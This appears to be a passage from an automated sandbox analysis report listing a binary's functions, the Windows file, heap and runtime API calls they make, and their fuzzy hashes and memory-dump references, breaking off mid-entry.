Opcode Fuzzy Hash: 3d58022817f50a08c9d2506e629488bbadeafe27c37e06da3b22b885aa0682a7
Instruction Fuzzy Hash: 5C31D631904208AFDF12EFA9E951BADF7E5EF42320F264099E4149F292EB719D41CB50

Function 00379F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0037CC94,00000001,?,?,?,00000000,00384ECD,?,?,?), ref: 00379F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00384ECD,?,?,?,?,?,00384972,?), ref: 00379F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0037CC94,00000001,?,?), ref: 00379FB8

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 3fa5a507cb1f27bd64609231bd283a6f29a49f51604234d10482a9ad52d16e59
Instruction ID: 16d2ad2b97acdd75e4df3fe257f9b4272de1ab066fab3fc4341696c38792f069
Opcode Fuzzy Hash: 3fa5a507cb1f27bd64609231bd283a6f29a49f51604234d10482a9ad52d16e59
Instruction Fuzzy Hash: AA3126312083059BDF368F14DC4876ABBA8EB95711F048A1EF949DB281C778DD48CBB2

Function 0037A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A261
GetLastError.KERNEL32(?,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A27E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: fac8385b0e852a1ec1fadd37d8882d9f26d3cec66ee35017fb3987f6cb19846e
Instruction ID: 02cc6e12b0b1c79e1833a3e5e56b4d50a6456fd2ab73e5e7124be30c31ce388d
Opcode Fuzzy Hash: fac8385b0e852a1ec1fadd37d8882d9f26d3cec66ee35017fb3987f6cb19846e
Instruction Fuzzy Hash: 09019231144A14A6DB33AB644C05BED735CAF4B742F05CC55F909E9052DB6ECA81C6A7

Function 0039AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0039B019

Strings

, xrefs: 0039B05E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 5eeb1f329c7c202ec8272997e8b97d4e50cb9d7a8a539e4d03e7ce6ca75d4dd7
Instruction ID: 802ce4bd57b3c0643b0687b8a6d95963aa4605fba6bf6f3cb4708ebfbc0dbbff
Opcode Fuzzy Hash: 5eeb1f329c7c202ec8272997e8b97d4e50cb9d7a8a539e4d03e7ce6ca75d4dd7
Instruction Fuzzy Hash: 6341F4B050438C9BDF238A289D94AEBFBADEB45704F1404EDE59A87242D335AA458F60

Function 0039A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0039A79D

Strings

LCMapStringEx, xrefs: 0039A73D, 0039A747

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 89f8547ac6c7f4598eb6fc08a9778158b08fae8971396ba2b02a9e6edb1a823c
Instruction ID: a40b9f43928c167aa55313893f04e80138aff82326864d7b5223b1e0c2130465
Opcode Fuzzy Hash: 89f8547ac6c7f4598eb6fc08a9778158b08fae8971396ba2b02a9e6edb1a823c
Instruction Fuzzy Hash: FB01E53654420DBBCF03AFA4DC46DEE7F66EF09750F054654FE1425160CA768A31EB91

Function 0039A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00399D2F), ref: 0039A715

Strings

InitializeCriticalSectionEx, xrefs: 0039A6E5

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 67dac8e31834aa2c73b6aaa78cc165f09ccc58b5b9eccc27b888dfeb554fe1e7
Instruction ID: cac3eeb2d3e638e65a6d2a6b121246c19a28a0cdc51633ae3433276e4cf749d2
Opcode Fuzzy Hash: 67dac8e31834aa2c73b6aaa78cc165f09ccc58b5b9eccc27b888dfeb554fe1e7
Instruction Fuzzy Hash: E5F0BE3264561CBBCF136FA0CC06CEE7F65EF06760F014654FC092A260DA718A10ABD1

Function 0039A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0039A5AE

Strings

FlsAlloc, xrefs: 0039A58A

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 6379dc02820d56603cc65fdec725d33204efce7b0623cd41753bc19b60f8977d
Instruction ID: e880615fa1278525613ca95f22d288e0a49adb8e0dae1a068b668efb8a47c093
Opcode Fuzzy Hash: 6379dc02820d56603cc65fdec725d33204efce7b0623cd41753bc19b60f8977d
Instruction Fuzzy Hash: E8E05531B852286B8A136B60CC029EEBBA8CB17710F060254FC051B280CE704E0092D6

Function 0039329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 003932AF

Strings

FlsAlloc, xrefs: 0039329E, 003932A8

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 5f0434747d520a5332fb778a9226e4d8459742939a9a3ce3434b0f99b96a1712
Instruction ID: 19bfd5c3d6d9ec8c69a1636c193eb07f2d9d9d628fa289bc490bee2562632122
Opcode Fuzzy Hash: 5f0434747d520a5332fb778a9226e4d8459742939a9a3ce3434b0f99b96a1712
Instruction Fuzzy Hash: BBD05B627817346BD51336D56C039EE7E44C703FF5F450592FE0C5E16395A1455142D5

Function 0038E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038E20B

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Strings

3Qo, xrefs: 0038E1F9, 0038E205

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Qo
API String ID: 1269201914-1944013411
Opcode ID: 6ef6ed525a39592a999bb97318b267ffcbfd45a51e1166c1337b2ed0b0a68212
Instruction ID: 9bc730dd8659999169b90c9a4c664a4390e9eaa94a827c9fd80d13176dc73dc0
Opcode Fuzzy Hash: 6ef6ed525a39592a999bb97318b267ffcbfd45a51e1166c1337b2ed0b0a68212
Instruction Fuzzy Hash: 5AB012A666E201BCB20F31017D06C77032CC4C0B52330845FF205D80C195404C055132

Function 0039B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0039AF1B: GetOEMCP.KERNEL32(00000000,?,?,0039B1A5,?), ref: 0039AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0039B1EA,?,00000000), ref: 0039B3C4
GetCPInfo.KERNEL32(00000000,0039B1EA,?,?,?,0039B1EA,?,00000000), ref: 0039B3D7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 756c8ec625d8a287cbbd27375a0a7502e08cdc27affc9b88d0345d6fdb1719a3
Instruction ID: 5a74f5c9374bec7dd3214ff9b92efc7fb1d053dbd85740b7e4d744aa62f4fe77
Opcode Fuzzy Hash: 756c8ec625d8a287cbbd27375a0a7502e08cdc27affc9b88d0345d6fdb1719a3
Instruction Fuzzy Hash: CF5153709003059FDF279F36E9806BAFBE8EF41300F19806ED0968B253D7399942EB90

Function 00371385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00371385

Part of subcall function 00376057: __EH_prolog.LIBCMT ref: 0037605C

Part of subcall function 0037C827: __EH_prolog.LIBCMT ref: 0037C82C
Part of subcall function 0037C827: new.LIBCMT ref: 0037C86F
Part of subcall function 0037C827: new.LIBCMT ref: 0037C893

new.LIBCMT ref: 003713FE

Part of subcall function 0037B07D: __EH_prolog.LIBCMT ref: 0037B082

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 22d1dde4fbc9d629ded88bab5717ca86386bf51545a871c58b7f64165e231d49
Instruction ID: 0dc108ffdfeb7758137f3da06857120f5f18ffe6d5ed342297eeca72e655e65b
Opcode Fuzzy Hash: 22d1dde4fbc9d629ded88bab5717ca86386bf51545a871c58b7f64165e231d49
Instruction Fuzzy Hash: 144165B0805B40DEE726DF7984859E7FBE5FB18300F404A6ED2EE87282CB326554CB11

Function 00371380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00371385

Part of subcall function 00376057: __EH_prolog.LIBCMT ref: 0037605C

Part of subcall function 0037C827: __EH_prolog.LIBCMT ref: 0037C82C
Part of subcall function 0037C827: new.LIBCMT ref: 0037C86F
Part of subcall function 0037C827: new.LIBCMT ref: 0037C893

new.LIBCMT ref: 003713FE

Part of subcall function 0037B07D: __EH_prolog.LIBCMT ref: 0037B082

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ff0220b80cb5e944bc27b1b243f967f3192c2ae1eb38280fc871bff204539dff
Instruction ID: 3dada500cfe96669da77120f2ddd68de3d59760a2887a2f30fa2362fb313864d
Opcode Fuzzy Hash: ff0220b80cb5e944bc27b1b243f967f3192c2ae1eb38280fc871bff204539dff
Instruction Fuzzy Hash: F04142B0805B409EE726DF798485AE7FAE5FB19310F404A6ED2EE87282DB322554CB11

Function 0037971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00379EDC,?,?,00377867), ref: 003797A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00379EDC,?,?,00377867), ref: 003797DB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 33e9b7e6512d11462127d24039aaace7ebd5d96797ca638f434992021cd9c93e
Instruction ID: c1b4e01946b1249cd6eda2c2aa961ce9f97a4d90a4a641c24f27f69f859f8566
Opcode Fuzzy Hash: 33e9b7e6512d11462127d24039aaace7ebd5d96797ca638f434992021cd9c93e
Instruction Fuzzy Hash: C3212870004784EFD7358F64CC86BA7B7ECEB49764F008A1EF1D982191C378AC448B20

Function 00379D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00377547,?,?,?,?), ref: 00379D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00379E2C

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 901bbf18cafbd41e7c89e6ee18282ba8cb96c87625508a92b8280cfed9a37132
Instruction ID: 71e7f4ad5b53caa2080ad9b0ebca8e5d936c5861b93ebe790c1d48f3d76803cc
Opcode Fuzzy Hash: 901bbf18cafbd41e7c89e6ee18282ba8cb96c87625508a92b8280cfed9a37132
Instruction Fuzzy Hash: C521E431148286AFC736DE24C451FAABBE8AF52304F058A5EB8D587151D32DDA0CDB51

Function 0039A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,003A3958), ref: 0039A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0039A4C5

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: f2a4b088da41b5d2c74386fc4506127f33148db1d662f2ce926daadf919589aa
Instruction ID: cea85bc1128b270f363f43832d0a2c80f38eecd9718897972d11506f1685f623
Opcode Fuzzy Hash: f2a4b088da41b5d2c74386fc4506127f33148db1d662f2ce926daadf919589aa
Instruction Fuzzy Hash: EE112933A01A219B9F27DE2EEC4486A73999B81320B1B4320FD15EB354EB74EC41C7D2

Function 00379B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00379B35,?,?,00000000,?,?,00378D9C,?), ref: 00379BC0
GetLastError.KERNEL32 ref: 00379BCD

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: c9bba2bc839fd6caa01b8ca5244ce9b767bf1d1dd178bc223a8979f5667dd90b
Instruction ID: 1a7f74cf03282aa54caf89f2fff32bc9284649d0bc8b485928bdcbe87acf1f7e
Opcode Fuzzy Hash: c9bba2bc839fd6caa01b8ca5244ce9b767bf1d1dd178bc223a8979f5667dd90b
Instruction Fuzzy Hash: 1D0108313042059F8B2ACE25AC84A7EB75DEFC1321B10C72FF81B87280CB38D8059721

Function 00379E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00379E76
GetLastError.KERNEL32 ref: 00379E82

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 8299bfd0dfc0780042a45fbe92a4dacc75e94241ec0208da859db9e2e35e627c
Instruction ID: 2f0b2974cbcce91d050766a814302471e8f3e1a622ed14569ab248813f9ad7be
Opcode Fuzzy Hash: 8299bfd0dfc0780042a45fbe92a4dacc75e94241ec0208da859db9e2e35e627c
Instruction Fuzzy Hash: FB01B5713052005BEB36DE29DC89B6BB7DD9B85724F15CA3EF14AC3A80DA39DC488711

Function 00398606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00398627

Part of subcall function 00398518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,003B0F50,0037CE57,?,?,?,?,?,?), ref: 00398663

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 01f7c4ecc45657a3f59c93c9581c2246031444a38bb0488a24d2823f0784fdab
Instruction ID: 82c4c582a8a8f6a70ef529baa57c5990988c91045e94a1206b09e653b841cd9a
Opcode Fuzzy Hash: 01f7c4ecc45657a3f59c93c9581c2246031444a38bb0488a24d2823f0784fdab
Instruction Fuzzy Hash: D3F09032206115AADF232B26AC00F6F376C9FD3BB0F264126FA549E591DF30DC0195A5

Function 00380908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00380915
